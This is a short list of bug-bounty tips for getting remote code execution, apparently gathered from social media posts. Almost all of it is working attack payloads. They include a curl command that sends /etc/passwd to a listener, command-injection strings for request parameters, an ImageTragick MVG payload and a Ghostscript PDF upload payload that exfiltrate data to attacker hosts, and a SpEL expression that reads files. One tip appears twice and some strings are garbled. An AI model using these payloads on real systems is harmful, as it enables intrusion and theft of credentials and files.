If server only allows GET and POST method, then try adding “X-HTTP-Method -Override: PUT to achieve RCE via PUT method.
Blind RCE - Grabs /etc/passwd and dumps it to your netcat listener via POST cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/
cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/
Found an endpoint which is doing something with images? Give this a shot > request=input&&id , request=input|id , request=inputid or you can even setup a NC & try request=input&&http://wgetyourserver.com :port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty
If you ever get the ability to run arbitrary Python code on a server try to get RCE by running: import os;os.system("ls"); Replacing "ls" with any number of shell commands.
Recon to RCE: Google "upload" site:”target" -> upload form -> ImageTragick MVG -> RCE PoC: push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1")' pop graphic-context
RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64…) ) .putdeviceparams quit #BugBounty
#bugbountytip Found an endpoint which is doing something with images? Give this a shot > request=input&&id , request=input|id , request=input`id` or you can even setup a NC & try request=input&&http://wgetyourserver.com:port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty
Does the target use AEM? try this path target[.]com/etc/groovyconsole.html and use the payload in the pic If you lucky enough you can have nice RCE ;) Good luck :) #bugbounty #bugcrowd #bugbountytips
If you can get SpEL injection but can't get RCE, try exfiltrating a file with B64 encoding: T(java.util.Base64).getEncoder().encodeToString(T(http://org.apache.commons.io.FileUtils).readFileToString('/proc/self/cmdline').getBytes())
Last updated 2 years ago
